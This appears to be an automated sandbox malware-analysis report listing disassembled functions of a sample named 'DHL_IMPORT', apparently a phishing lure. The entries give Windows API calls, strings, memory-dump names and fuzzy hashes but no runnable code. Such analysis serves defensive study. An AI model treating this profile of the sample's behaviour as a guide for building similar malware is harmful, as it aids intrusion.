                                                                                          Function 007FE27D Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 189COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __startOneArgErrorHandling.LIBCMT ref: 007FE30D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorHandling__start
                                                                                          • String ID: pow
                                                                                          • API String ID: 3213639722-2276729525
                                                                                          • Opcode ID: 032876a9a3cb559a398c7a4be763f75e43f772c9c985ea90553b9268447c2bb1
                                                                                          • Instruction ID: 29da0ef3a3e692b644e4a6759cc64473a8216a1ffb0e58372e91397433d54d7e
                                                                                          • Opcode Fuzzy Hash: 032876a9a3cb559a398c7a4be763f75e43f772c9c985ea90553b9268447c2bb1
                                                                                          • Instruction Fuzzy Hash: F5514961E0D20A96DB557B18CD093793BA4FF40B40F3049A8E5D5C23FDEB389CD19A46
                                                                                          Function 007EE187 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 184COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: #
                                                                                          • API String ID: 0-1885708031
                                                                                          • Opcode ID: 1a7e104fa02d3af6b537adc74d6fbdbb9025860c16ac6b1da14ec04e93aace27
                                                                                          • Instruction ID: b1760946636691419e19036cf95f9ae0e386e41d6e1eae27f68ade25249e9b6f
                                                                                          • Opcode Fuzzy Hash: 1a7e104fa02d3af6b537adc74d6fbdbb9025860c16ac6b1da14ec04e93aace27
                                                                                          • Instruction Fuzzy Hash: 64513235601296DFDF14DF68D0856BA7BA8FF19310F24845AF991DB2C0DA389D82CBA4
                                                                                          Function 007EF291 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Sleep.KERNEL32(00000000), ref: 007EF2A2
                                                                                          • GlobalMemoryStatusEx.KERNEL32(?), ref: 007EF2BB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: GlobalMemorySleepStatus
                                                                                          • String ID: @
                                                                                          • API String ID: 2783356886-2766056989
                                                                                          • Opcode ID: a8ff4a13042fd90dd59adf2f4ae3d5ce614d8600904124d4abb2c629ec85b57c
                                                                                          • Instruction ID: 48e577142d7138ae112c511972f2d5473cbcaa7349f45bec718bd9988df9d129
                                                                                          • Opcode Fuzzy Hash: a8ff4a13042fd90dd59adf2f4ae3d5ce614d8600904124d4abb2c629ec85b57c
                                                                                          • Instruction Fuzzy Hash: 87512872418745DBD320AF14DC8ABABBBF8FF84300F81885DF1D981295EB748529CB66
                                                                                          Function 00855745 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 125COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CharUpperBuffW.USER32(?,?,?,00000003,?,?), ref: 008557E0
                                                                                          • _wcslen.LIBCMT ref: 008557EC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: BuffCharUpper_wcslen
                                                                                          • String ID: CALLARGARRAY
                                                                                          • API String ID: 157775604-1150593374
                                                                                          • Opcode ID: 03e57c53c6e34ac489f1681f3ad7ded4a39ba1e3a8eecd4cceb23d883b415a0e
                                                                                          • Instruction ID: 9bcb83f7c7a2b0ad09edbaee49b8e3a1545a1611f7f83d0225defa4ed57b3ed2
                                                                                          • Opcode Fuzzy Hash: 03e57c53c6e34ac489f1681f3ad7ded4a39ba1e3a8eecd4cceb23d883b415a0e
                                                                                          • Instruction Fuzzy Hash: 5D41DC31E00209DFCB04DFA9C8958BEBBB5FF59725F10402AE905E7291E7749D89CBA0
                                                                                          Function 0084D0F4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • _wcslen.LIBCMT ref: 0084D130
                                                                                          • InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 0084D13A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CrackInternet_wcslen
                                                                                          • String ID: |
                                                                                          • API String ID: 596671847-2343686810
                                                                                          • Opcode ID: d59b7a3b8137568c42b23f54ef4f5df7d678187c15d4435cd3abc70919694837
                                                                                          • Instruction ID: abdff34fc8a1ab5e24c5977306b283e09f1f4863fd60204355ff8ce69dfab956
                                                                                          • Opcode Fuzzy Hash: d59b7a3b8137568c42b23f54ef4f5df7d678187c15d4435cd3abc70919694837
                                                                                          • Instruction Fuzzy Hash: 2B311D75D00219EBCF15EFA4CC89AEEBFB9FF04304F10001AF915A6266E735AA56DB50
                                                                                          Function 0086356C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 96COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(?,?,?,?), ref: 00863621
                                                                                          • MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 0086365C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$DestroyMove
                                                                                          • String ID: static
                                                                                          • API String ID: 2139405536-2160076837
                                                                                          • Opcode ID: eea09e5898e2d90dd5306a056c4b0a15dafef9649528446475c9fd35e65612f2
                                                                                          • Instruction ID: 2e86bddc8066647d38be04947cd5ffe61f1a2ea793ac07481d915124e4cbabe4
                                                                                          • Opcode Fuzzy Hash: eea09e5898e2d90dd5306a056c4b0a15dafef9649528446475c9fd35e65612f2
                                                                                          • Instruction Fuzzy Hash: 9F319E71100204AEDB109F68DC85EFB73A9FF98724F01961AF9A5D7290DA74AD81D760
                                                                                          Function 00864537 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(?,00001132,00000000,?), ref: 0086461F
                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00864634
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: '
                                                                                          • API String ID: 3850602802-1997036262
                                                                                          • Opcode ID: 015681ca7bc3d15d6af35395adc1de5368d40f0c1981409a0dd14b6fc777e62f
                                                                                          • Instruction ID: e527fa9493f2ff681325843f4d67bd2bc026d088611f9c88c3f559614fe60df5
                                                                                          • Opcode Fuzzy Hash: 015681ca7bc3d15d6af35395adc1de5368d40f0c1981409a0dd14b6fc777e62f
                                                                                          • Instruction Fuzzy Hash: 76311674A0120A9FEF14CFA9C984ADEBBB5FB19300F15506AE905EB341D770A941CF90
                                                                                          Function 007D3923 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 008133A2
                                                                                            • Part of subcall function 007D6B57: _wcslen.LIBCMT ref: 007D6B6A
                                                                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007D3A04
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: IconLoadNotifyShell_String_wcslen
                                                                                          • String ID: Line:
                                                                                          • API String ID: 2289894680-1585850449
                                                                                          • Opcode ID: aa9945f35a8d04042e3f600dd6199a49743e4c5a18814b5f3cf64d11174cfd18
                                                                                          • Instruction ID: 7c9eb3bbe55b869a88ba4c6d1959298e26be33727c81a3ed7222cc6d1848cc75
                                                                                          • Opcode Fuzzy Hash: aa9945f35a8d04042e3f600dd6199a49743e4c5a18814b5f3cf64d11174cfd18
                                                                                          • Instruction Fuzzy Hash: D131C471508304AADB21EB10DC49BEBB7ECBF41714F00452BF59982791DB78AA48C7D3
                                                                                          Function 008631EF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 0086327C
                                                                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00863287
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: Combobox
                                                                                          • API String ID: 3850602802-2096851135
                                                                                          • Opcode ID: 59d972e87ac77e1fb93eaef1f4da3d3d6e25d148fcb352c6304b98e88d408a6e
                                                                                          • Instruction ID: 38c5fa6538f510044eb43250ddd4ae03fb4b3fb8d533e955d66296f3e1c803fa
                                                                                          • Opcode Fuzzy Hash: 59d972e87ac77e1fb93eaef1f4da3d3d6e25d148fcb352c6304b98e88d408a6e
                                                                                          • Instruction Fuzzy Hash: C311E271300208BFFF219E54DC95EBB37AAFB943A5F120128F928E7390D6719D518760
                                                                                          Function 00863710 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D600E: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 007D604C
                                                                                            • Part of subcall function 007D600E: GetStockObject.GDI32(00000011), ref: 007D6060
                                                                                            • Part of subcall function 007D600E: SendMessageW.USER32(00000000,00000030,00000000), ref: 007D606A
                                                                                          • GetWindowRect.USER32(00000000,?), ref: 0086377A
                                                                                          • GetSysColor.USER32(00000012), ref: 00863794
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                                                          • String ID: static
                                                                                          • API String ID: 1983116058-2160076837
                                                                                          • Opcode ID: 1d16c1fb0a30e1b288b8f206bfb8813a40b7c6b91b6e8ba83e17aec25f8d4794
                                                                                          • Instruction ID: 65589b951ec83d629b1ea7e4c64f1b39f103202e7add1ea0b7f54a0884232698
                                                                                          • Opcode Fuzzy Hash: 1d16c1fb0a30e1b288b8f206bfb8813a40b7c6b91b6e8ba83e17aec25f8d4794
                                                                                          • Instruction Fuzzy Hash: FB113AB2610209AFDF00DFA8CC46EFA7BB8FB09354F014525F9A6E2250E775E8519B50
                                                                                          Function 0084CD1E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66networkCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0084CD7D
                                                                                          • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 0084CDA6
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$OpenOption
                                                                                          • String ID: <local>
                                                                                          • API String ID: 942729171-4266983199
                                                                                          • Opcode ID: 77a7dea11a3774b9d34040bc379d33d3a6661f8559d76017082c8dbea1f74959
                                                                                          • Instruction ID: d4328d8dfe1bb9982fdb29aeab7a9632c7c1fa46116c08201cffd82637a1ad90
                                                                                          • Opcode Fuzzy Hash: 77a7dea11a3774b9d34040bc379d33d3a6661f8559d76017082c8dbea1f74959
                                                                                          • Instruction Fuzzy Hash: 6811C671A06639BAD7B84B668C45FF7BE6CFF127A4F004226B159C3190D7749840D6F0
                                                                                          Function 00863429 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 64windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetWindowTextLengthW.USER32(00000000), ref: 008634AB
                                                                                          • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008634BA
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: LengthMessageSendTextWindow
                                                                                          • String ID: edit
                                                                                          • API String ID: 2978978980-2167791130
                                                                                          • Opcode ID: 32cb5fab25de1a871df1739e9fff7888b8e0ba30927f8f9ef277ccc70dc01c7f
                                                                                          • Instruction ID: 3cb7af01e1cef085d26b67994ed9f27612b354415e5a05b1a09b679a04b890af
                                                                                          • Opcode Fuzzy Hash: 32cb5fab25de1a871df1739e9fff7888b8e0ba30927f8f9ef277ccc70dc01c7f
                                                                                          • Instruction Fuzzy Hash: C5119D71100108AAEB114E64DC44EBA776AFB25378F524324FA61D31E0CB75DD519758
                                                                                          Function 00836C86 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 56COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • CharUpperBuffW.USER32(?,?,?), ref: 00836CB6
                                                                                          • _wcslen.LIBCMT ref: 00836CC2
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                          • String ID: STOP
                                                                                          • API String ID: 1256254125-2411985666
                                                                                          • Opcode ID: 6eb9855d6e3059886d58f7f529591f1a777aa94664a62991fe63ce63613586e1
                                                                                          • Instruction ID: d188a6f79b03e0234fbad60d711ff2ec1d6c0c9af5680c7fb83a4d551a891295
                                                                                          • Opcode Fuzzy Hash: 6eb9855d6e3059886d58f7f529591f1a777aa94664a62991fe63ce63613586e1
                                                                                          • Instruction Fuzzy Hash: E6010832A00526ABCB209FBDDC448BF77B4FBA0714B004529E452D6291FA35D811C790
                                                                                          Function 00831CDE Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00831D4C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: f938adafd8778e7a84b16e949247f387ba3a40ac0d5d8a738eea4bde707e1e04
                                                                                          • Instruction ID: 0f62113e80fa93124d3b70254da6ac104f5afa58c13cf3291d3f80e17001fbc7
                                                                                          • Opcode Fuzzy Hash: f938adafd8778e7a84b16e949247f387ba3a40ac0d5d8a738eea4bde707e1e04
                                                                                          • Instruction Fuzzy Hash: 6A01D871601218AB8F04EBA4DC59CFE7778FB97750F44051AF872A73C1EB38590887A0
                                                                                          Function 00831BD8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00831C46
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: 5e3abd76c7425643c2f9f518b3ff399ebd43e496205646cc4a537a5e29824c0f
                                                                                          • Instruction ID: 040fd97d71997e536b64fb58f0c189ec86be6f6a7286e07bde82f5535aac9e74
                                                                                          • Opcode Fuzzy Hash: 5e3abd76c7425643c2f9f518b3ff399ebd43e496205646cc4a537a5e29824c0f
                                                                                          • Instruction Fuzzy Hash: C301F771780108A6CF04EBA0C9599FF77A8FB61740F14101AB516B3381EA249E0997F1
                                                                                          Function 00831C5C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                            • Part of subcall function 00833CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00833CCA
                                                                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00831CC8
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClassMessageNameSend_wcslen
                                                                                          • String ID: ComboBox$ListBox
                                                                                          • API String ID: 624084870-1403004172
                                                                                          • Opcode ID: dbd95cad79052b190883512b91f15cdd19a812dd657dc745a7adae87d007b2ab
